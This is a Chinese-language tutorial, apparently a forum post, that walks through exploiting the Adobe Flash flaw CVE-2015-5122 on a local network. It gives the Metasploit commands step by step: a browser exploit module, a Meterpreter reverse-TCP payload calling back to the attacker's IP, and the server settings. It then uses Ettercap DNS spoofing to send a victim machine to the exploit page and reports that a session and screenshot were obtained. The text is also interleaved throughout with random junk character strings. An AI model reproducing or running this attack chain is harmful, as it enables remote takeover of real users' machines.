|
{ v) j7 g6 Y/ c9 J; F 二、cve2015-5122漏洞实例演示虚拟机 $ }, p3 o8 a. n1 t9 v+ u
7 \2 v+ y( N' p+ G# s: l8 s
1 y+ y, f2 g7 c; t/ X m
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
( a" d3 t1 n# l# W0 E + l* j: @ M. V! U- d
# y0 W6 H7 I, N6 `
search cve-2015-5122如图: / {/ f% [7 F/ z+ o I
$ `$ F8 A1 m, T! }
* ?" V+ w) `6 A0 F0 X4 q# i: t 2 H( _/ F+ @7 |; P; ? e
2 [0 a/ M( A/ U
" F/ c3 e2 t' B" n, d# s 下面我们敲如下命令: P$ e$ ~! `5 K+ A% W
7 n8 V. J( G) U3 Y! U- g
9 i1 r$ m* q1 _( F- }; I
use exploit/multi/browser/adobe_flash_opaque_background_uaf ' z+ n# o3 s+ z: q
: t7 i, g4 [# y j3 G+ s; k7 Z0 u1 `& F% a; z/ G
set PAYLOAD windows/meterpreter/reverse_tcp
: W4 I( S9 u" ]! g4 S+ f/ e 0 X4 I* \ L0 F" J" D
" G7 F" q0 {$ N0 Z/ r set LHOST 192.168.0.109
. I1 A9 Z5 d; S3 U 5 s7 g* F9 J& |, M' L1 _
" v) x( }: y% D1 U Q. U$ u set URIPATH / /*根目录*/ 0 e+ O; b' Y& V- H/ E
( b' _- s, D! [
6 c; z) @% K1 y& k0 w }$ t set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
( ?1 }) y1 N2 H4 e5 h* {
' ?4 }+ t' `2 z0 R
9 ^2 h) l5 V" F) ~ set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' B7 P% _1 I$ k% {1 |' n
; n0 Q# J& }* H# Q
7 O7 y8 r" k/ W1 @% m 然后show options如图:
1 h; r2 h4 y$ \# f2 A
) q- W& v% d/ w @5 n0 s5 y' t% {% Z+ `! V# Q! D0 O( \6 j" [( C
0 r% ?) D4 }$ ?* i8 k2 i. P
. l( [; A4 G* `. i; U
: g: y( n8 t( r# k' f+ F+ B
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
" ~& x* Q/ `* _- r7 a' `( m 6 l9 a# j* ^# N' I. R3 b/ p# Z: M
" M7 n6 |$ o0 O
+ V- M1 Z. E; R2 c3 v, Q
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
) g" b. Q; `* Y: } d0 @5 b
* j% c; \1 z" b: b: z$ Y; u) U0 B% o" H" l. n
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 3 Q3 D0 }7 E3 }8 |9 }) x/ E5 f8 L
, [, x* L2 |, I, z& Z. ^1 R# E0 z3 M f) K F' i
- I1 _# N* s/ h: O7 \! |; ?
: X" X, T6 z) u4 I" |: |, c$ G$ B4 c
成功了,这时候我们断开ettercap,如图: 4 ~$ x& W4 X5 f' J0 ?
4 |* W4 z9 Q8 T$ e. Y8 c( q
6 U) {1 {; o2 d 7 e2 T+ C( o- K3 w
7 I% w8 B8 E5 \
2 h4 z$ x' @3 f Screenshot如图:
2 c) t% [0 p* I% t; w+ g4 u n) D: N% @) @& S, T
9 b4 z' {6 y; ^% w
6 ]" y4 T/ ]9 i5 `; F
8 Z5 l; [( s- a% D
7 p: l5 s3 G. F$ X" k% @& V1 | - A; [. }2 y- |5 `% s6 d# f1 d' R
|